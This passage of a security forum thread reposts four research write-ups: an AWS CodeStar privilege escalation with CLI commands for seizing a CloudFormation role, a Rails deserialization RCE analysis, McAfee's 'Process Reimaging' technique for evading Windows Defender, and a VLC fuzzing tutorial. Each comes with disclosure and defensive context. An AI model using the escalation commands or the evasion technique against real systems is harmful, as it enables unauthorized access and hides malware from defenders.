wait, additional versions of that policy will be created as other resources in the environment are created. The script will output the AWS CLI command you need to run to view your own user’s permissions, once the privilege escalation has complete. That command will look something like this (pay attention though, because the version ID will change, depending on the template you are using): aws iam get-policy-version --profile default --policy-arn arn:aws:iam::ACCOUNT-ID:policy/CodeStar_PROJECTNAME_Owner --version-id v3 It might take some time for that command to execute successfully while everything gets spun up in the environment, but once it is able to execute successfully, that means the privilege escalation process is complete. Utilizing Your New Permissions You’ll now have all the permissions that the policy you just viewed grants, and as part of that, you are granted the “cloudformation:UpdateStack” permission on a CloudFormation stack that has already had the “CodeStarWorker-<project name>-CloudFormation” IAM role passed to it. That means you can use that role for what you want, without ever needing the “iam:PassRole” permission. The permissions granted to this role should be the same every time (unless they update the template behind the scenes) and you won’t have permission to view them. Without prior information: visit this link to see what the access looks like. With the EC2/VPC information: visit this link to see what the access looks like. The script will also output the command to use to update the CloudFormation stack that you want to target. That command will look like this: aws cloudformation update-stack --profile default --region us-east-1 --stack-name awscodestar-PROJECTNAME-lambda --capabilities "CAPABILITY_NAMED_IAM" --template-body file://PATH-TO-CLOUDFORMATION-TEMPLATE Without prior information: the stack’s name will be “awscodestar-<project name>-lambda” With the EC2/VPC information: the stack’s name will be “awscodestar-<project name>-infrastructure”. Just create a CloudFormation template to create/modify the resources that you want and run that UpdateStack command to take control of the CloudFormation role. Video Example The following video shows a user who is only granted the “codestar:CreateProjectFromTemplate” permission escalating their permissions with the exploit script. The video only shows part 1 of 2 of the full attack-process because the next step depends on what your goal is. After the privilege escalation shown in this video is done, the next step would be to take control of the CloudFormation IAM role and abuse its permissions. The first step of the privilege escalation grants you access to a few things, including control over that CloudFormation role. Then, because the CloudFormation role has more access than you do, you can instruct it to perform an action on your behalf, whatever that may be. Note that around the 1 minute mark we cut out a few minutes of refreshing the browser. It takes time for the resources to deploy and the privilege escalation is not complete until all of them deploy, so there is a bit of waiting required. Defending Against Privilege Escalation through CodeStar There are a few key points to defending against this privilege escalation method in an AWS environment. If you don’t use CodeStar in your environment, ensure that the CodeStar IAM service role is removed from or never created in your account (the default name is “aws-codestar-service-role”). Implement the principle of least-privilege when granting access to your environment. This entails avoiding the use of wildcards in IAM policies where possible so that you can be 100% sure what APIs you are granting your users access to. Do not grant CodeStar permissions to your users unless they require it. Be careful granting CodeStar permissions through wildcards when they do require it, so that users aren’t granted the “codestar:CreateProjectFromTemplate” permission. If a user must be granted “codestar:CreateProject” and “iam:PassRole” (and/or “codestar:AssociateTeamMember”), be sure that sufficient monitoring is in place to detect any privilege escalation attempts. Conclusion The CodeStar undocumented API vulnerability has for the most part been fixed, but it is still a good idea to implement the defense strategies outlined above. This type of vulnerability might not only be limited to CodeStar, though, because there might be other undocumented APIs for other AWS services that are abusable like this one. Many undocumented APIs were discovered in just the short amount of time it took to find this vulnerability. Sometimes these undocumented APIs can be beneficial for attackers, while some might be useless. Either way, it is always useful as an attacker to dig deep and figure out what APIs exist and which ones are abusable. As a defender, it is necessary to keep up with the attackers to defend against unexpected and unknown attack vectors. Following best practice, like not using wildcards when giving permissions, is also a great way to avoid this vulnerability. We’ll be at re:Inforce next week, with two more big releases coming before the event. We’ll also be teaming up with Protego and handing out copies of our AWS pentesting book to the first 50 people each day of the event. Sursa: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/
  13. Remote Code Execution via Ruby on Rails Active Storage Insecure Deserialization June 20, 2019 | Guest Blogger In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Sivathmican Sivakumaran and Pengsu Cheng of the Trend Micro Security Research Team detail a recent code execution vulnerability in Ruby on Rails. The bug was originally discovered and reported by the researcher known as ooooooo_q. The following is a portion of their write-up covering CVE-2019-5420, with a few minimal modifications. An insecure deserialization vulnerability has been reported in the ActiveStorage component of Ruby on Rails. This vulnerability is due to deserializing a Ruby object within an HTTP URL using Marshal.load() without sufficient validation. The Vulnerability Rails is an open source web application Model View Controller (MVC) framework written in the Ruby language. Rails is built to encourage software engineering patterns and paradigms such as convention over configuration (CoC), don't repeat yourself (DRY), and the active record pattern. Rails ships as the following individual components: Rails 5.2 also ships with Active Storage, which is the component of interest for this vulnerability. Active Storage is used to store files and associate those files to Active Record. It is compatible with cloud storage services such as Amazon S3, Google Cloud Storage, and Microsoft Azure Storage. Ruby supports serialization of Objects to JSON, YAML or the Marshal serialization format. The Marshal serialization format is implemented by the Marshal class. Objects can be serialized and deserialized via the load() and dump() methods respectively. As shown above, the Marshal serialization format uses a type-length-value representation to serialize objects. Active Storage adds a few routes by default to the Rails application. Of interest to this report are the following two routes which are responsible for downloading and uploading files respectively: An insecure deserialization vulnerability exists in the ActiveStorage component of Ruby on Rails. This component uses ActiveSupport::MessageVerifier to ensure the integrity of the above :encoded_key and :encoded_token variables. In normal use, these variables are generated by MessageVerifier.generate(), and their structure is as follows: <base64-message> contains a base64 encoded version of the following JSON object: When a GET or PUT Request is sent to a URI that contains “/rails/active_storage/disk/”, the :encoded_key and :encoded_token variables are extracted. These variables are expected to be generated by MessageVerifier.generate(), hence decode_verified_key and decode_verified_token call MessageVerifier.verified() to check the integrity of and deserialize . Integrity is checked by calling ActiveSupport::SecurityUtils.secure_compare(digest, generate_digest(data))The digest is generated by signing data with a MessageVerifier secret. For Rails applications in development, this secret is always the application name, which is publicly known. For Rails applications in production, the secret is stored in a credentials.yml.enc file, which is encrypted using a key in the master.key. The contents of these files can be disclosed using CVE-2019-5418. Once the integrity check passes, is base64 decoded and Marshal.load() is called on the resulting byte stream without any further validation. An attacker can exploit this condition by embedding a dangerous object, such as ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy, to achieve remote code execution. CVE-2019-5418 needs to be chained to CVE-2019-5420 to ensure all conditions are met to achieve code execution. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request embedding malicious serialized objects to a vulnerable application. Successful exploitation would result in arbitrary code execution under the security context of the affected Ruby on Rails application. Source Code Walkthrough The following code snippet was taken from Rails version 5.2.1. Comments added by Trend Micro have been highlighted. From activesupport/lib/active_support/message_verifier.rb: From activestorage/app/controllers/active_storage/disk_controller.rb: The Exploit There is a publicly available Metasploit module demonstrating this vulnerability. The following stand-alone Python code may also be used. The usage is simply: python poc.py <host> [<port>] Please note our Python PoC assumes that the application name is "Demo::Application". The Patch This vulnerability received a patch from the vendor in March 2019. In addition to this bug, the patch also provides fixes for CVE-2019-5418, a file content disclosure bug, and CVE-2019-5419, a denial-of-service bug in Action View. If you are not able to immediately apply the patch, this issue can be mitigated by specifying a secret key in development mode. In config/environments/development.rb file, add the following: config.secret_key_base = SecureRandom.hex(64) The only other salient mitigation is to restrict access to the affected ports. Conclusion This bug exists in versions 6.0.0.X and 5.2.X of Rails. Given that this vulnerability received a CVSS v3 score of 9.8, users of Rails should definitely look to upgrade or apply the mitigations soon. Special thanks to Sivathmican Sivakumaran and Pengsu Cheng of the Trend Micro Security Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Security Research services please visit http://go.trendmicro.com/tis/. The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the ZDI team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization
  14. In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass By Eoin Carroll, Cedric Cochin, Steve Povolny and Steve Hearnden on Jun 20, 2019 Process Reimaging Overview The Windows Operating System has inconsistencies in how it determines process image FILE_OBJECT locations, which impacts non-EDR (Endpoint Detection and Response) Endpoint Security Solution’s (such as Microsoft Defender Realtime Protection), ability to detect the correct binaries loaded in malicious processes. This inconsistency has led McAfee’s Advanced Threat Research to develop a new post-exploitation evasion technique we call “Process Reimaging”. This technique is equivalent in impact to Process Hollowing or Process Doppelganging within the Mitre Attack Defense Evasion Category; however, it is , much easier to execute as it requires no code injection. While this bypass has been successfully tested against current versions of Microsoft Windows and Defender, it is highly likely that the bypass will work on any endpoint security vendor or product implementing the APIs discussed below. The Windows Kernel, ntoskrnl.exe, exposes functionality through NTDLL.dll APIs to support User-mode components such as Endpoint Security Solution (ESS) services and processes. One such API is K32GetProcessImageFileName, which allows ESSs to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure. The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification. We have developed a proof-of-concept which exploits this FILE_OBJECT location inconsistency by hiding the physical location of a process EXE. The PoC allowed us to persist a malicious process (post exploitation) which does not get detected by Windows Defender. The Process Reimaging technique cannot be detected by Windows Defender until it has a signature for the malicious file and blocks it on disk before process creation or performs a full scan on suspect machine post compromise to detect file on disk. In addition to Process Reimaging Weaponization and Protection recommendations, this blog includes a technical deep dive on reversing the Windows Kernel APIs for process attribute verification and Process Reimaging attack vectors. We use the SynAck Ransomware as a case study to illustrate Process Reimaging impact relative to Process Hollowing and Doppelganging; this illustration does not relate to Windows Defender ability to detect Process Hollowing or Doppelganging but the subverting of trust for process attribute verification. Antivirus Scanner Detection Points When an Antivirus scanner is active on a system, it will protect against infection by detecting running code which contains malicious content, and by detecting a malicious file at write time or load time. The actual sequence for loading an image is as follows: FileCreate – the file is opened to be able to be mapped into memory. Section Create – the file is mapped into memory. Cleanup – the file handle is closed, leaving a kernel object which is used for PAGING_IO. ImageLoad – the file is loaded. CloseFile – the file is closed. If the Antivirus scanner is active at the point of load, it can use any one of the above steps (1,2 and 4) to protect the operating system against malicious code. If the virus scanner is not active when the image is loaded, or it does not contain definitions for the loaded file, it can query the operating system for information about which files make up the process and scan those files. Process Reimaging is a mechanism which circumvents virus scanning at step 4, or when the virus scanner either misses the launch of a process or has inadequate virus definitions at the point of loading. There is currently no documented method to securely identify the underlying file associated with a running process on windows. This is due to Windows’ inability to retrieve the correct image filepath from the NTDLL APIs. This can be shown to evade Defender (MpMsEng.exe/MpEngine.dll) where the file being executed is a “Potentially Unwanted Program” such as mimikatz.exe. If Defender is enabled during the launch of mimikatz, it detects at phase 1 or 2 correctly. If Defender is not enabled, or if the launched program is not recognized by its current signature files, then the file is allowed to launch. Once Defender is enabled, or the signatures are updated to include detection, then Defender uses K32GetProcessImageFileName to identify the underlying file. If the process has been created using our Process Reimaging technique, then the running malware is no longer detected. Therefore, any security service auditing running programs will fail to identify the files associated with the running process. Subverting Trust The Mitre ATT&CK model specifies post-exploitation tactics and techniques used by adversaries, based on real-world observations for Windows, Linux and macOS Endpoints per figure 1 below. Figure 1 – Mitre Enterprise ATT&CK Once an adversary gains code execution on an endpoint, before lateral movement, they will seek to gain persistence, privilege escalation and defense evasion capabilities. They can achieve defense evasion using process manipulation techniques to get code executing in a trusted process. Process manipulation techniques have existed for a long time and evolved from Process Injection to Hollowing and Doppelganging with the objective of impersonating trusted processes. There are other Process manipulation techniques as documented by Mitre ATT&CK and Unprotect Project, but we will focus on Process Hollowing and Process Doppelganging. Process manipulation techniques exploit legitimate features of the Windows Operating System to impersonate trusted process executable binaries and generally require code injection. ESSs place inherent trust in the Windows Operating System for capabilities such as digital signature validation and process attribute verification. As demonstrated by Specter Ops, ESSs’ trust in the Windows Operating system could be subverted for digital signature validation. Similarly, Process Reimaging subverts an ESSs’ trust in the Windows Operating System for process attribute verification. When a process is trusted by an ESS, it is perceived to contain no malicious code and may also be trusted to call into the ESS trusted infrastructure. McAfee ATR uses the Mitre ATT&CK framework to map adversarial techniques, such as defense evasion, with associated campaigns. This insight helps organizations understand adversaries’ behavior and evolution so that they can assess their security posture and respond appropriately to contain and eradicate attacks. McAfee ATR creates and shares Yara rules based on threat analysis to be consumed for protect and detect capabilities. Process Manipulation Techniques (SynAck Ransomware) McAfee Advanced Threat Research analyzed SynAck ransomware in 2018 and discovered it used Process Doppelganging with Process Hollowing as its fallback defense evasion technique. We use this malware to explain the Process Hollowing and Process Doppelganging techniques, so that they can be compared to Process Reimaging based on a real-world observation. Process Manipulation defense evasion techniques continue to evolve. Process Doppelganging was publicly announced in 2017, requiring advancements in ESSs for protection and detection capabilities. Because process manipulation techniques generally exploit legitimate features of the Windows Operating system they can be difficult to defend against if the Antivirus scanner does not block prior to process launch. Process Hollowing “Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis” (see figure 2 below) Figure 2 – SynAck Ransomware Defense Evasion with Process Hollowing Process Doppelganging “Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging’s use of Windows Transactional NTFS (TxF) also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext” (see figure 3 below) Figure 3 – SynAck Ransomware Defense Evasion with Doppleganging Process Reimaging Weaponization The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths which enable an adversary to bypass windows operating system process attribute verification. This allows an adversary to persist a malicious process (post exploitation) by hiding the physical location of a process EXE (see figure 4 below). Figure 4 – SynAck Ransomware Defense Evasion with Process Reimaging Process Reimaging Technical Deep Dive NtQueryInformationProcess retrieves all process information from EPROCESS structure fields in the kernel and NtQueryVirtualMemory retrieves information from the Virtual Address Descriptors (VADs) field in EPROCESS structure. The EPROCESS structure contains filename and path information at the following fields/offsets (see figure 5 below): +0x3b8 SectionObject (filename and path) +0x448 ImageFilePointer* (filename and path) +0x450 ImageFileName (filename) +0x468 SeAuditProcessCreationInfo (filename and path) * this field is only present in Windows 10 Figure 5 – Code Complexity IDA Graph Displaying NtQueryInformationProcess Filename APIs within NTDLL Kernel API NtQueryInformationProcess is consumed by following the kernelbase/NTDLL APIs: K32GetModuleFileNameEx K32GetProcessImageFileName QueryFullProcessImageImageFileName The VADs hold a pointer to FILE_OBJECT for all mapped images in the process, which contains the filename and filepath (see figure 6 below). Kernel API NtQueryVirtualMemory is consumed by following the kernelbase/NTDLL API: GetMappedFileName Figure 6 – Code Complexity IDA Graph Displaying NtQueryVirtualMemory Filename API within NTDLL Windows fails to update any of the above kernel structure fields when a FILE_OBJECT filepath is modified post-process creation. Windows does update FILE_OBJECT filename changes, for some of the above fields. The VADs reflect any filename change for a loaded image after process creation, but they don’t reflect any rename of the filepath. The EPROCESS fields also fail to reflect any renaming of the process filepath and only the ImageFilePointer field reflects a filename change. As a result, the APIs exported by NtQueryInformationProcess and NtQueryVirtualMemory return incorrect process image file information when called by ESSs or other Applications (see Table 1 below). Table 1 OS/Kernel version and API Matrix Prerequisites for all Attack Vectors Process Reimaging targets the post-exploitation phase, whereby a threat actor has already gained access to the target system. This is the same prerequisite of Process Hollowing or Doppelganging techniques within the Defense Evasion category of the Mitre ATT&CK framework. Process Reimaging Attack Vectors FILE_OBJECT Filepath Changes Simply renaming the filepath of an executing process results in Windows OS returning the incorrect image location information for all APIs (See figure 7 below). This impacts all Windows OS versions at the time of testing. Figure 7 FILE_OBJECT Filepath Changes – Filepath Changes Impact all Windows OS versions FILE_OBJECT Filename Changes Filename Change >= Windows 10 Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for K32GetProcessImageFileName API (See figure 8.1.1 below). This has been confirmed to impact Windows 10 only. Figure 8.1.1 FILE_OBJECT Filename Changes – Filename Changes impact Windows >= Windows 10 Per figure 8.1.2 below, GetModuleFileNameEx and QueryFullProcessImageImageFileName will get the correct filename changes due to a new EPROCESS field ImageFilePointer at offset 448. The instruction there (mov r12, [rbx+448h]) references the ImageFilePointer from offset 448 into the EPROCESS structure. Figure 8.1.2 NtQueryInformationProcess (Windows 10) – Windows 10 RS1 x64 ntoskrnl version 10.0.14393.0 Filename Change < Windows 10 Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for K32GetProcessImageFileName, GetModuleFileNameEx and QueryFullProcessImageImageFileName APIs (See figure 8.2.1 below). This has been confirmed to impact Windows 7 and Windows 8. Figure 8.2.1 FILE_OBJECT Filename Changes – Filename Changes Impact Windows < Windows 10 Per Figure8.2.2 below, GetModuleFileNameEx and QueryFullProcessImageImageFileName will get the incorrect filename (PsReferenceProcessFilePointer references EPROCESS offset 0x3b8 SectionObject). Figure 8.2.2 NtQueryInformationProcess (Windows 7 and 😎 – Windows 7 SP1 x64 ntoskrnl version 6.1.7601.17514 LoadLibrary FILE_OBJECT reuse LoadLibrary FILE_OBJECT reuse leverages the fact that when a LoadLibrary or CreateProcess is called after a LoadLibrary and FreeLibrary on an EXE or DLL, the process reuses the existing image FILE_OBJECT in memory from the prior LoadLibrary. Exact Sequence is: LoadLibrary (path\filename) FreeLibrary (path\filename) LoadLibrary (renamed path\filename) or CreateProcess (renamed path\filename) This results in Windows creating a VAD entry in the process at step 3 above, which reuses the same FILE_OBJECT still in process memory, created from step 1 above. The VAD now has incorrect filepath information for the file on disk and therefore the GetMappedFileName API will return the incorrect location on disk for the image in question. The following prerequisites are required to evade detection successfully: The LoadLibrary or CreateProcess must use the exact same file on disk as the initial LoadLibrary Filepath must be renamed (dropping the same file into a newly created path will not work) The Process Reimaging technique can be used in two ways with LoadLibrary FILE_OBJECT reuse attack vector: LoadLibrary (see figure 9 below) When an ESS or Application calls the GetMappedFileName API to retrieve a memory-mapped image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing. Figure 9 LoadLibrary FILE_OBJECT Reuse (LoadLibrary) – Process Reimaging Technique Using LoadLibrary Impacts all Windows OS Versions 2. CreateProcess (See figure 10 below) When an ESS or Application calls the GetMappedFileName API to retrieve the process image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing. Figure 10 LoadLibrary FILE_OBJECT Reuse (CreateProcess) – Process Reimaging Technique using CreateProcess Impacts all Windows OS Versions Process Manipulation Techniques Comparison Windows Defender Process Reimaging Filepath Bypass Demo This video simulates a zero-day malware being dropped (Mimikatz PUP sample) to disk and executed as the malicious process “phase1.exe”. Using the Process Reimaging Filepath attack vector we demonstrate that even if Defender is updated with a signature for the malware on disk it will not detect the running malicious process. Therefore, for non-EDR ESSs such as Defender Real-time Protection (used by Consumers and also Enterprises) the malicious process can dwell on a windows machine until a reboot or the machine receives a full scan post signature update. CVSS and Protection Recommendations CVSS If a product uses any of the APIs listed in table 1 for the following use cases, then it is likely vulnerable: Process reputation of a remote process – any product using the APIs to determine if executing code is from a malicious file on disk CVSS score 5.0 (Medium) https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N (same score as Doppelganging) Trust verification of a remote process – any product using the APIs to verify trust of a calling process CVSS score will be higher than 5.0; scoring specific to Endpoint Security Solution architecture Protection Recommendations McAfee Advanced Threat Research submitted Process Reimaging technique to Microsoft on June 5th, 2018. Microsoft released a partial mitigation to Defender in the June 2019 Cumulative update for the Process Reimaging FILE_OBJECT filename changes attack vector only. This update was only for Windows 10 and does not address the vulnerable APIs in Table 1 at the OS level; therefore, ESSs are still vulnerable to Process Reimaging. Defender also remains vulnerable to the FILE_OBJECT filepath changes attack vector executed in the bypass demo video, and this attack vector affects all Windows OS versions. New and existing Process Manipulation techniques which abuse legitimate Operating System features for defense evasion are difficult to prevent dynamically by monitoring specific API calls as it can lead to false positives such as preventing legitimate processes from executing. A process which has been manipulated by Process Reimaging will be trusted by the ESS unless it has been traced by EDR or a memory scan which may provide deeper insight. Mitigations recommended to Microsoft File System Synchronization (EPROCESS structures out of sync with the filesystem or File Control Block structure (FCB) Allow the EPROCESS structure fields to reflect filepath changes as is currently implemented for the filename in the VADs and EPROCESS ImageFilePointer fields. There are other EPROCESS fields which do not reflect changes to filenames and need to be updated, such as K32GetModuleFileNameEx on Windows 10 through the ImageFilePointer. API Usage (most returning file info for process creation time) Defender (MpEngine.dll) currently uses K32GetProcessImageFileName to get process image filename and path when it should be using K32GetModuleFileNameEx. Consolidate the duplicate APIs being exposed from NtQueryInformationProcess to provide easier management and guidance to consumers that require retrieving process filename information. For example, clearly state GetMappedFileName should only be used for DLLs and not EXE backing process). Differentiate in API description whether the API is only limited to retrieving the filename and path at process creation or real-time at time of request. Filepath Locking Lock filepath and name similar to lock file modification when a process is executing to prevent modification. Standard user at a minimum should not be able to rename binary paths for its associated executing process. Reuse of existing FILE_OBJECT with LoadLibrary API (Prevent Process Reimaging) LoadLibrary should verify any existing FILE_OBJECT it reuses, has the most up to date Filepath at load time. Short term mitigation is that Defender should at least flag that it found malicious process activity but couldn’t find associated malicious file on disk (right now it fails open, providing no notification as to any potential threats found in memory or disk). Mitigation recommended to Endpoint Security Vendors The FILE_OBJECT ID must be tracked from FileCreate as the process closes its handle for the filename by the time the image is loaded at ImageLoad. This ID must be managed by the Endpoint Security Vendor so that it can be leveraged to determine if a process has been reimaged when performing process attribute verification. Sursa: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/
  15. Introduction I spent three months working on VLC using Honggfuzz, tweaking it to suit the target. In the process, I found five vulnerabilities, one of which was a high-risk double-free issue and merited CVE-2019-12874. Here’s the VLC advisory https://www.videolan.org/security/sa1901.html. Here’s how I found it. I hope you find the how-to useful and it inspires you to get fuzzing. Background VLC VLC is a free media player which is open-source, portable, cross-platform and streaming media server, developed by the VideoLAN project. Media players such as VLC usually have a very complex codebase, including parsing and supporting a large number of file media file formats, math calculations, codecs, demux, text renderers and more complex code. Figure 1: Loaded modules within the VLC binary. honggfuzz For this project I used honggfuzz, a modern, feedback-driven fuzzer based on code coverage, developed by Robert Swiecki. Why honggfuzz? It provides an easy way to instrument a target (unfortunately it did not work for this target but we will see how I was able to overcome those issues), it has some very powerful commands such as mutate only X amount of bytes (using the -F parameter), an easy to use command line and it uses AddressSanitzer instrumentation for software coverage saving all the unique crashes as well as the coverage files which hit new block codes. It would be very difficult to discover those bugs without using code coverage, as given the complexity of the code, I would probably never be able to hit those paths! Getting VLC and building it VLC depends on many libraries and external projects. On an Ubuntu system, this is easily solved by just getting all the dependencies via apt: $ apt-get build-dep vlc (If you’re on ubuntu make sure to also install libxcb-xkb-dev package.) Now I’ll grab the source code – remember you want to be running the very latest version! While you’re there, let’s run bootstrap which will generate the makefiles for our platform. $ git clone https://github.com/videolan/vlc $ ./bootstrap Once that’s done, I also want to add support for AddressSanitizer. Unfortunately, passing –with-sanitizer=address when issuing the configure command is not enough as it will give errors just before compilation finishes due to missing compilation flags. As such, I need to revert the following commit, so I can compile VLC successfully and add AddressSanitizer instrumentation. $ git revert e85682585ab27a3c0593c403b892190c52009960 Getting samples First things first, I need to start by getting decent samples. FAs luck would have it the FFmpeg test suite has already a massive decent samples (that may or may not crash FFmpeg) which will help me get started. For this iteration I tried to fuzz the .mkv format, so the following command quickly gave decent initial seed files: $ wget -r https://samples.ffmpeg.org/ -A mkv Figure 2: Getting samples with wget. Once there are a decent number of samples, the next step it to limit to relative small samples only such as 5mb: $ find . -name "*.mkv" -type f -size -5M -exec mv -f {} ~/Desktop/mkv_samples/ \; Code Coverage (using GCC) Once we have our samples, we need to verify whether our initial seed does indeed give us decent coverage – the more code lines/blocks we hit, the better chances we might have to find a bug. Let’s compile VLC using GCC’s coverage flags: $ CC=gcc CXX=g++ ./configure --enable-debug --enable-coverage $ make -j8 Once compilation is successful, we can confirm if we have the gcno files: $ find . -name *.gcno At this phase, we are ready to run one by one our seed files and get some nice graphs. Depending on the samples and movies length, we need to figure out a way to play X seconds and exit cleanly VLC otherwise we’re going to be here all night! Luckily, VLC has already the following two parameters: –play-and-exit and –run-time=n (where n a number in seconds). Let’s quickly navigate back to our samples folder and run this little bash script: #!/bin/bash FILES=/home/symeon/Desktop/vlc_samples-master/honggfuzz_coverage/*.mkv for f in $FILES do echo "[*] Processing $f file..." ASAN_OPTIONS=detect_leaks=0 timeout 5 ./vlc-static --play-and-exit --run-time=5 "$f" done Once executed, you should be seeing VLC playing 5 seconds, exiting and then looping over the videos one by one. Continuing, we are going to use @ea_foundation‘s covnavi little tool, which gets all the coverage information and does all the heavy lifting for you. Figure 3: Generating coverage using gcov. Notice that a new folder web has been created, if you open index.html with your favourite browser, navigate to demux/mkv and take a look at the initial coverage. With our basic sample set, we managed to hit 45.1% lines and 33.9% functions! Figure 4: Initial coverage after running the inital seed files. Excellent, we can confirm that we have a decent amount of coverage and we are ready to move on to fuzzing! The harness While searching the documentation, it turns out that VLC has provided a sample API code which can be used to play a media file for a few seconds and then shut down the player. That’s exactly what we are looking for! They also have a provided an extensive list with all the modules which can be found here. #include <stdio.h> #include <stdlib.h> #include <vlc/vlc.h> int main(int argc, char* argv[]) { libvlc_instance_t * inst; libvlc_media_player_t *mp; libvlc_media_t *m; if(argc < 2) { printf("usage: %s <input>\n", argv[0]); return 0; } /* Load the VLC engine */ inst = libvlc_new (0, NULL); /* Create a new item */ m = libvlc_media_new_path (inst, argv[1]); /* Create a media player playing environement */ mp = libvlc_media_player_new_from_media (m); /* No need to keep the media now */ libvlc_media_release (m); /* play the media_player */ libvlc_media_player_play (mp); sleep (2); /* Let it play a bit */ /* Stop playing */ libvlc_media_player_stop (mp); /* Free the media_player */ libvlc_media_player_release (mp); libvlc_release (inst); return 0; } In order to compile the above harness, we need to link against our fresh compiled library. Navigate to /etc/ld.so.conf.d and create a new file libvlc.conf and include the path of the liblvc: /home/symeon/vlc-coverage/lib/.libs Make sure to execute ldconfig to update the ldconfig. Now let’s compile the harness using our fresh libraries and link it against ASAN. hfuzz-clang harness.c -I/home/symeon/Desktop/vlc/include -L/home/symeon/Desktop/vlc/lib/.libs -o harness -lasan -lvlc After compiling our harness and executing it, unfortunately this would lead to the following crash making it impossible to use it for our fuzzing purposes: Figure 5: VLC harness crashing on config_getPsz function. Interestingly enough,by installing the libvlc-dev library (from the ubuntu repository) and linking against this library, the harness would successfully get executed, however this is not that useful for us as we would not have any coverage at all, something that we don’t want to. For our next step, let’s try to instrument the whole VLC binary using clang! Instrumenting VLC with honggfuzz (clang coverage) Since our previous method did not quite work, let’s try to compile VLC and use honggfuzz’s instrumentation. For this one, I will be using the latest clang as well the compiler-rt runtime libraries which adds support for code coverage. $:~/vlc-coverage/bin$ clang --version clang version 9.0.0 (https://github.com/llvm/llvm-project.git 281a5beefa81d1e5390516e831c6a08d69749791) Target: x86_64-unknown-linux-gnu Thread model: posix InstalledDir: /home/symeon/Desktop/llvm-project/build/bin Following honggfuzz’s feedback-driven instructions we need to run the following commands and will enable AddressSanitizer as well: $ export CC=/home/symeon/Desktop/honggfuzz/hfuzz_cc/hfuzz-clang $ export CXX=/home/symeon/Desktop/honggfuzz/hfuzz_cc/hfuzz-clang++ $ ./configure --enable-debug --with-sanitizer=address Once the configuration succeeds, now let’s try to compile it: $ make -j4 After a while however, compilation fails: <scratch space>:231:1: note: expanded from here VLC_COMPILER ^ ../config.h:785:34: note: expanded from macro 'VLC_COMPILER' #define VLC_COMPILER " "/usr/bin/ld" -z relro --hash-style=gnu --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o a.o... ^ 3 errors generated. make[3]: *** [Makefile:3166: version.lo] Error 1 make[3]: *** Waiting for unfinished jobs.... make[3]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/src' make[2]: *** [Makefile:2160: all] Error 2 make[2]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc/src' make[1]: *** [Makefile:1567: all-recursive] Error 1 make[1]: Leaving directory '/home/symeon/vlc-cov/covnavi/vlc' make: *** [Makefile:1452: all] Error 2 Looking at the config.log, we can see the following: #define VLC_COMPILE_BY "symeon" #define VLC_COMPILE_HOST "ubuntu" #define VLC_COMPILER " "/usr/bin/ld" -z relro --hash-style=gnu --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o a.out /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crt1.o /usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/8/crtbegin.o -L/usr/lib/gcc/x86_64-linux-gnu/8 -L/usr/lib/gcc/x86_64-linux-gnu/8/../../../x86_64-linux-gnu -L/lib/x86_64-linux-gnu -L/lib/../lib64 -L/usr/lib/x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/8/../../.. -L/home/symeon/Desktop/llvm-project/build/bin/../lib -L/lib -L/usr/lib --whole-archive /home/symeon/Desktop/llvm-project/build/lib/clang/9.0.0/lib/linux/libclang_rt.ubsan_standalone-x86_64.a --no-whole-archive --dynamic-list=/home/symeon/Desktop/llvm-project/build/lib/clang/9.0.0/lib/linux/libclang_rt.ubsan_standalone-x86_64.a.syms --wrap=strcmp --wrap=strcasecmp --wrap=strncmp --wrap=strncasecmp --wrap=strstr --wrap=strcasestr --wrap=memcmp --wrap=bcmp --wrap=memmem --wrap=strcpy --wrap=ap_cstr_casecmp --wrap=ap_cstr_casecmpn --wrap=ap_strcasestr --wrap=apr_cstr_casecmp --wrap=apr_cstr_casecmpn --wrap=CRYPTO_memcmp --wrap=OPENSSL_memcmp --wrap=OPENSSL_strcasecmp --wrap=OPENSSL_strncasecmp --wrap=memcmpct --wrap=xmlStrncmp --wrap=xmlStrcmp --wrap=xmlStrEqual --wrap=xmlStrcasecmp --wrap=xmlStrncasecmp --wrap=xmlStrstr --wrap=xmlStrcasestr --wrap=memcmp_const_time --wrap=strcsequal -u HonggfuzzNetDriver_main -u LIBHFUZZ_module_instrument -u LIBHFUZZ_module_memorycmp /tmp/libhfnetdriver.1000.419f7f6c4058b450.a /tmp/libhfuzz.1000.746a32a18d2c8f8a.a /tmp/libhfnetdriver.1000.419f7f6c4058b450.a --no-as-needed -lpthread -lrt -lm -ldl -lgcc --as-needed -lgcc_s --no-as-needed -lpthread 